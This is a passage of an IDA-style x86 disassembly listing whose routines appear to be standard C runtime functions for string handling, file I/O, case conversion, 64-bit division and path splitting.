loc_418330: ; CODE XREF: sub_4182F0+8F�j
and ebx, 3
jz short loc_418342
loc_418335: ; CODE XREF: sub_4182F0+22�j
; sub_4182F0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_41836E
dec ebx
jnz short loc_418335
loc_418342: ; CODE XREF: sub_4182F0+2B�j
; sub_4182F0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41834A: ; CODE XREF: sub_4182F0+2F�j
test edi, 3
jz short loc_418364
loc_418352: ; CODE XREF: sub_4182F0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4183E6
test edi, 3
jnz short loc_418352
loc_418364: ; CODE XREF: sub_4182F0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4183D7
loc_41836B: ; CODE XREF: sub_4182F0+7F�j
; sub_4182F0+F4�j
mov [edi], al
inc edi
loc_41836E: ; CODE XREF: sub_4182F0+4D�j
dec ebx
jnz short loc_41836B
pop ebx
pop esi
loc_418373: ; CODE XREF: sub_4182F0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_418379: ; CODE XREF: sub_4182F0+A9�j
; sub_4182F0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_418330
loc_418381: ; CODE XREF: sub_4182F0+20�j
; sub_4182F0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_418379
test dl, dl
jz short loc_4183CB
test dh, dh
jz short loc_4183C1
test edx, 0FF0000h
jz short loc_4183B7
test edx, 0FF000000h
jnz short loc_418379
mov [edi], edx
jmp short loc_4183CF
; ---------------------------------------------------------------------------
loc_4183B7: ; CODE XREF: sub_4182F0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4183CF
; ---------------------------------------------------------------------------
loc_4183C1: ; CODE XREF: sub_4182F0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4183CF
; ---------------------------------------------------------------------------
loc_4183CB: ; CODE XREF: sub_4182F0+AD�j
xor edx, edx
mov [edi], edx
loc_4183CF: ; CODE XREF: sub_4182F0+C5�j
; sub_4182F0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4183E1
loc_4183D7: ; CODE XREF: sub_4182F0+79�j
xor eax, eax
loc_4183D9: ; CODE XREF: sub_4182F0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4183D9
loc_4183E1: ; CODE XREF: sub_4182F0+E5�j
and ebx, 3
jnz short loc_41836B
loc_4183E6: ; CODE XREF: sub_4182F0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4182F0 endp
; =============== S U B R O U T I N E =======================================
sub_4183EE proc near ; CODE XREF: sub_406B85+2E2�p
; sub_406B85+435�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41846A
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_41840D
cmp edi, 1
jz short loc_41840D
cmp edi, 2
jnz short loc_41846A
loc_41840D: ; CODE XREF: sub_4183EE+13�j
; sub_4183EE+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_418424
push esi
call sub_41BAD3
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_418424: ; CODE XREF: sub_4183EE+27�j
push esi
call sub_41B4B0
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_418439
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_41844D
; ---------------------------------------------------------------------------
loc_418439: ; CODE XREF: sub_4183EE+42�j
test al, 1
jz short loc_41844D
test al, 8
jz short loc_41844D
test ah, 4
jnz short loc_41844D
mov dword ptr [esi+18h], 200h
loc_41844D: ; CODE XREF: sub_4183EE+49�j
; sub_4183EE+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41BA39
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_418477
; ---------------------------------------------------------------------------
loc_41846A: ; CODE XREF: sub_4183EE+B�j
; sub_4183EE+1D�j
mov dword_515884, 16h
or eax, 0FFFFFFFFh
loc_418477: ; CODE XREF: sub_4183EE+7A�j
pop edi
pop esi
retn
sub_4183EE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418480 proc near ; CODE XREF: sub_406B85+2AC�p
; sub_406B85+2CD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_4184B1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_4184AF
jz short loc_4184B1
dec ecx
dec ecx
loc_4184AF: ; CODE XREF: sub_418480+29�j
not ecx
loc_4184B1: ; CODE XREF: sub_418480+9�j
; sub_418480+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_418480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4184C0 proc near ; CODE XREF: sub_40707C+5C�p
; sub_40707C+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_418574
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_4184EA
loc_4184DB: ; CODE XREF: sub_4184C0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_41851B
test edi, 3
jnz short loc_4184DB
loc_4184EA: ; CODE XREF: sub_4184C0+19�j
; sub_4184C0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_4184EA
mov eax, [edi-4]
test al, al
jz short loc_418528
test ah, ah
jz short loc_418523
test eax, 0FF0000h
jz short loc_41851E
test eax, 0FF000000h
jnz short loc_4184EA
loc_41851B: ; CODE XREF: sub_4184C0+20�j
dec edi
jmp short loc_41852B
; ---------------------------------------------------------------------------
loc_41851E: ; CODE XREF: sub_4184C0+52�j
sub edi, 2
jmp short loc_41852B
; ---------------------------------------------------------------------------
loc_418523: ; CODE XREF: sub_4184C0+4B�j
sub edi, 3
jmp short loc_41852B
; ---------------------------------------------------------------------------
loc_418528: ; CODE XREF: sub_4184C0+47�j
sub edi, 4
loc_41852B: ; CODE XREF: sub_4184C0+5C�j
; sub_4184C0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_418540
mov ebx, ecx
shr ecx, 2
jnz short loc_41858C
jmp short loc_41855C
; ---------------------------------------------------------------------------
loc_418540: ; CODE XREF: sub_4184C0+75�j
; sub_4184C0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_41857A
mov [edi], dl
inc edi
dec ecx
jz short loc_418570
test esi, 3
jnz short loc_418540
mov ebx, ecx
shr ecx, 2
jnz short loc_41858C
loc_41855C: ; CODE XREF: sub_4184C0+7E�j
; sub_4184C0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_418570
loc_418563: ; CODE XREF: sub_4184C0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_418572
dec ecx
jnz short loc_418563
loc_418570: ; CODE XREF: sub_4184C0+8B�j
; sub_4184C0+A1�j
mov [edi], cl
loc_418572: ; CODE XREF: sub_4184C0+AB�j
pop ebx
pop esi
loc_418574: ; CODE XREF: sub_4184C0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41857A: ; CODE XREF: sub_4184C0+85�j
; sub_4184C0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418584: ; CODE XREF: sub_4184C0+E4�j
; sub_4184C0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_41855C
loc_41858C: ; CODE XREF: sub_4184C0+7C�j
; sub_4184C0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_418584
test dl, dl
jz short loc_41857A
test dh, dh
jz short loc_4185D8
test edx, 0FF0000h
jz short loc_4185C8
test edx, 0FF000000h
jnz short loc_418584
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4185C8: ; CODE XREF: sub_4184C0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4185D8: ; CODE XREF: sub_4184C0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4184C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185F0 proc near ; CODE XREF: sub_4071BD+2A2�p
; sub_40F6F1+32F2�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_418611
xor eax, eax
jmp short loc_418613
; ---------------------------------------------------------------------------
loc_418611: ; CODE XREF: sub_4185F0+1B�j
mov eax, edi
loc_418613: ; CODE XREF: sub_4185F0+1F�j
cld
pop edi
leave
retn
sub_4185F0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_418630
loc_418620: ; CODE XREF: sub_418630+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_418630
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418630 proc near ; CODE XREF: sub_408B8D+DB�p
; sub_40E08F+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00418620 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_418636: ; CODE XREF: sub_417980+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41865B
loc_418648: ; CODE XREF: sub_418630+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_418620
test cl, cl
jz short loc_4186A4
test edx, 3
jnz short loc_418648
loc_41865B: ; CODE XREF: sub_418630+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_418666: ; CODE XREF: sub_418630+61�j
; sub_418630+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4186A8
and eax, 81010100h
jz short loc_418666
and eax, 1010100h
jnz short loc_4186A2
and esi, 80000000h
jnz short loc_418666
loc_4186A2: ; CODE XREF: sub_418630+68�j
; sub_418630+81�j ...
pop esi
pop edi
loc_4186A4: ; CODE XREF: sub_418630+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4186A8: ; CODE XREF: sub_418630+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_4186E5
test al, al
jz short loc_4186A2
cmp ah, bl
jz short loc_4186DE
test ah, ah
jz short loc_4186A2
shr eax, 10h
cmp al, bl
jz short loc_4186D7
test al, al
jz short loc_4186A2
cmp ah, bl
jz short loc_4186D0
test ah, ah
jz short loc_4186A2
jmp short loc_418666
; ---------------------------------------------------------------------------
loc_4186D0: ; CODE XREF: sub_418630+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4186D7: ; CODE XREF: sub_418630+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4186DE: ; CODE XREF: sub_418630+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4186E5: ; CODE XREF: sub_418630+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_418630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4186EC proc near ; CODE XREF: sub_408B8D+AF�p
; sub_40F6F1+4A72�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_418700
xor eax, eax
jmp short loc_418736
; ---------------------------------------------------------------------------
loc_418700: ; CODE XREF: sub_4186EC+E�j
dec [ebp+arg_4]
push esi
jz short loc_418730
mov esi, [ebp+arg_8]
loc_418709: ; CODE XREF: sub_4186EC+42�j
dec dword ptr [esi+4]
js short loc_418718
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41871F
; ---------------------------------------------------------------------------
loc_418718: ; CODE XREF: sub_4186EC+20�j
push esi
call sub_41B582
pop ecx
loc_41871F: ; CODE XREF: sub_4186EC+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41873A
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_418730
dec [ebp+arg_4]
jnz short loc_418709
loc_418730: ; CODE XREF: sub_4186EC+18�j
; sub_4186EC+3D�j ...
and byte ptr [edi], 0
loc_418733: ; CODE XREF: sub_4186EC+55�j
mov eax, ebx
pop esi
loc_418736: ; CODE XREF: sub_4186EC+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41873A: ; CODE XREF: sub_4186EC+36�j
cmp edi, [ebp+arg_0]
jnz short loc_418730
xor ebx, ebx
jmp short loc_418733
sub_4186EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418743 proc near ; CODE XREF: sub_40917E+BF�p
; sub_40917E+12C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword_5158EC
push ebx
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_4], ebx
jnz short loc_418777
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz short loc_4187DE
loc_41875F: ; CODE XREF: sub_418743+30�j
mov cl, [edx]
cmp cl, 61h
jl short loc_418770
cmp cl, 7Ah
jg short loc_418770
sub cl, 20h
mov [edx], cl
loc_418770: ; CODE XREF: sub_418743+21�j
; sub_418743+26�j
inc edx
cmp [edx], bl
jnz short loc_41875F
jmp short loc_4187DE
; ---------------------------------------------------------------------------
loc_418777: ; CODE XREF: sub_418743+11�j
push esi
push edi
push 1
push ebx
push ebx
push ebx
push 0FFFFFFFFh
mov esi, 200h
push [ebp+arg_0]
push esi
push eax
call sub_41BC2B
mov edi, eax
add esp, 20h
cmp edi, ebx
jz short loc_4187D0
push edi
call sub_417BEE
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_4187D0
push 1
push ebx
push edi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push dword_5158EC
call sub_41BC2B
add esp, 20h
test eax, eax
jz short loc_4187D0
push [ebp+var_4]
push [ebp+arg_0]
call sub_417A00
pop ecx
pop ecx
loc_4187D0: ; CODE XREF: sub_418743+53�j
; sub_418743+61�j ...
push [ebp+var_4]
call sub_417C62
mov eax, [ebp+arg_0]
pop ecx
pop edi
pop esi
loc_4187DE: ; CODE XREF: sub_418743+1A�j
; sub_418743+32�j
pop ebx
leave
retn
sub_418743 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4187E1 proc near ; CODE XREF: sub_40A8C6+6�p
; sub_40A8E4+4A�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_5158EC, 0
push ebx
push esi
push edi
jnz short loc_41880E
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4188A7
cmp eax, 5Ah
jg loc_4188A7
add eax, 20h
jmp loc_4188A7
; ---------------------------------------------------------------------------
loc_41880E: ; CODE XREF: sub_4187E1+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_418842
cmp dword_43B7AC, esi
jle short loc_418830
push esi
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41883A
; ---------------------------------------------------------------------------
loc_418830: ; CODE XREF: sub_4187E1+42�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, esi
loc_41883A: ; CODE XREF: sub_4187E1+4D�j
test eax, eax
jnz short loc_418842
loc_41883E: ; CODE XREF: sub_4187E1+AD�j
mov eax, ebx
jmp short loc_4188A7
; ---------------------------------------------------------------------------
loc_418842: ; CODE XREF: sub_4187E1+3A�j
; sub_4187E1+5B�j
mov edx, off_43B5A0
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_418866
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_41886F
; ---------------------------------------------------------------------------
loc_418866: ; CODE XREF: sub_4187E1+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_41886F: ; CODE XREF: sub_4187E1+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push dword_5158EC
call sub_41BC2B
add esp, 20h
test eax, eax
jz short loc_41883E
cmp eax, esi
jnz short loc_41889A
movzx eax, [ebp+var_4]
jmp short loc_4188A7
; ---------------------------------------------------------------------------
loc_41889A: ; CODE XREF: sub_4187E1+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4188A7: ; CODE XREF: sub_4187E1+16�j
; sub_4187E1+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4187E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4188AC proc near ; CODE XREF: sub_40B0E7+204�p
; sub_40B0E7+2B5�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_4188D0
xor eax, eax
jmp loc_41899D
; ---------------------------------------------------------------------------
loc_4188D0: ; CODE XREF: sub_4188AC+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_4188E3
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_4188EA
; ---------------------------------------------------------------------------
loc_4188E3: ; CODE XREF: sub_4188AC+2D�j
mov [ebp+arg_C], 1000h
loc_4188EA: ; CODE XREF: sub_4188AC+35�j
; sub_4188AC+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_41891E
mov eax, [esi+4]
test eax, eax
jz short loc_41891E
cmp ebx, eax
mov edi, ebx
jb short loc_418904
mov edi, eax
loc_418904: ; CODE XREF: sub_4188AC+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_417490
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_418964
; ---------------------------------------------------------------------------
loc_41891E: ; CODE XREF: sub_4188AC+47�j
; sub_4188AC+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_418969
test ecx, ecx
jz short loc_418932
push esi
call sub_41B4B0
test eax, eax
pop ecx
jnz short loc_4189AB
loc_418932: ; CODE XREF: sub_4188AC+79�j
cmp [ebp+arg_C], 0
jz short loc_418945
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_418947
; ---------------------------------------------------------------------------
loc_418945: ; CODE XREF: sub_4188AC+8A�j
mov edi, ebx
loc_418947: ; CODE XREF: sub_4188AC+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_41BE4F
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4189A2
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_4189A2
loc_418964: ; CODE XREF: sub_4188AC+70�j
mov edi, [ebp+var_4]
jmp short loc_418992
; ---------------------------------------------------------------------------
loc_418969: ; CODE XREF: sub_4188AC+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_41922E
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4189AB
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_418992
mov [ebp+arg_C], 1
loc_418992: ; CODE XREF: sub_4188AC+BB�j
; sub_4188AC+DD�j
test ebx, ebx
jnz loc_4188EA
mov eax, [ebp+arg_8]
loc_41899D: ; CODE XREF: sub_4188AC+1F�j
; sub_4188AC+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4189A2: ; CODE XREF: sub_4188AC+AD�j
; sub_4188AC+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_4189AD
; ---------------------------------------------------------------------------
loc_4189AB: ; CODE XREF: sub_4188AC+84�j
; sub_4188AC+CF�j
mov eax, edi
loc_4189AD: ; CODE XREF: sub_4188AC+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_41899D
sub_4188AC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4189C0 proc near ; CODE XREF: sub_40BCF7+3D�p
; sub_40D5BA+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_4189E1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_418A31
; ---------------------------------------------------------------------------
loc_4189E1: ; CODE XREF: sub_4189C0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_4189EF: ; CODE XREF: sub_4189C0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4189EF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_418A1A
cmp edx, [esp+4+arg_4]
ja short loc_418A1A
jb short loc_418A22
cmp eax, [esp+4+arg_0]
jbe short loc_418A22
loc_418A1A: ; CODE XREF: sub_4189C0+4A�j
; sub_4189C0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_418A22: ; CODE XREF: sub_4189C0+52�j
; sub_4189C0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_418A31: ; CODE XREF: sub_4189C0+1F�j
pop ebx
retn 10h
sub_4189C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418A40 proc near ; CODE XREF: sub_40BCF7+24�p
; sub_40D5BA+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_418A62
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_418AA3
; ---------------------------------------------------------------------------
loc_418A62: ; CODE XREF: sub_418A40+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_418A70: ; CODE XREF: sub_418A40+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_418A70
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_418A9E
cmp edx, [esp+8+arg_4]
ja short loc_418A9E
jb short loc_418A9F
cmp eax, [esp+8+arg_0]
jbe short loc_418A9F
loc_418A9E: ; CODE XREF: sub_418A40+4E�j
; sub_418A40+54�j
dec esi
loc_418A9F: ; CODE XREF: sub_418A40+56�j
; sub_418A40+5C�j
xor edx, edx
mov eax, esi
loc_418AA3: ; CODE XREF: sub_418A40+20�j
pop esi
pop ebx
retn 10h
sub_418A40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AA8 proc near ; CODE XREF: sub_40BDAD+1E3�p
; ___:0040ED32�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_417AF0
cmp eax, 1
pop ecx
jb short loc_418AE3
cmp byte ptr [ebx+1], 3Ah
jnz short loc_418AE3
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_418ADF
push 2
push ebx
push esi
call sub_41C3DC
add esp, 0Ch
and byte ptr [esi+2], 0
loc_418ADF: ; CODE XREF: sub_418AA8+25�j
inc ebx
inc ebx
jmp short loc_418AED
; ---------------------------------------------------------------------------
loc_418AE3: ; CODE XREF: sub_418AA8+18�j
; sub_418AA8+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_418AED
and byte ptr [eax], 0
loc_418AED: ; CODE XREF: sub_418AA8+39�j
; sub_418AA8+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_418B65
loc_418B00: ; CODE XREF: sub_418AA8+87�j
mov cl, [eax]
movzx edx, cl
test byte_516DA1[edx], 4
jz short loc_418B11
inc eax
jmp short loc_418B2B
; ---------------------------------------------------------------------------
loc_418B11: ; CODE XREF: sub_418AA8+64�j
cmp cl, 2Fh
jz short loc_418B25
cmp cl, 5Ch
jz short loc_418B25
cmp cl, 2Eh
jnz short loc_418B2B
mov [ebp+var_4], eax
jmp short loc_418B2B
; ---------------------------------------------------------------------------
loc_418B25: ; CODE XREF: sub_418AA8+6C�j
; sub_418AA8+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_418B2B: ; CODE XREF: sub_418AA8+67�j
; sub_418AA8+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_418B00
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_418B65
cmp [ebp+arg_8], 0
jz short loc_418B60
sub edi, ebx
cmp edi, esi
jb short loc_418B49
mov edi, esi
loc_418B49: ; CODE XREF: sub_418AA8+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_41C3DC
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_418B60: ; CODE XREF: sub_418AA8+97�j
mov ebx, [ebp+arg_4]
jmp short loc_418B6F
; ---------------------------------------------------------------------------
loc_418B65: ; CODE XREF: sub_418AA8+56�j
; sub_418AA8+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_418B6F
and byte ptr [ecx], 0
loc_418B6F: ; CODE XREF: sub_418AA8+BB�j
; sub_418AA8+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_418BC2
cmp edi, ebx
jb short loc_418BC2
cmp [ebp+arg_C], 0
jz short loc_418B9F
sub edi, ebx
cmp edi, esi
jb short loc_418B88
mov edi, esi
loc_418B88: ; CODE XREF: sub_418AA8+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_41C3DC
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_418B9F: ; CODE XREF: sub_418AA8+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_418BEA
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_418BAF
mov esi, eax
loc_418BAF: ; CODE XREF: sub_418AA8+103�j
push esi
push [ebp+var_4]
push edi
call sub_41C3DC
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_418BEA
; ---------------------------------------------------------------------------
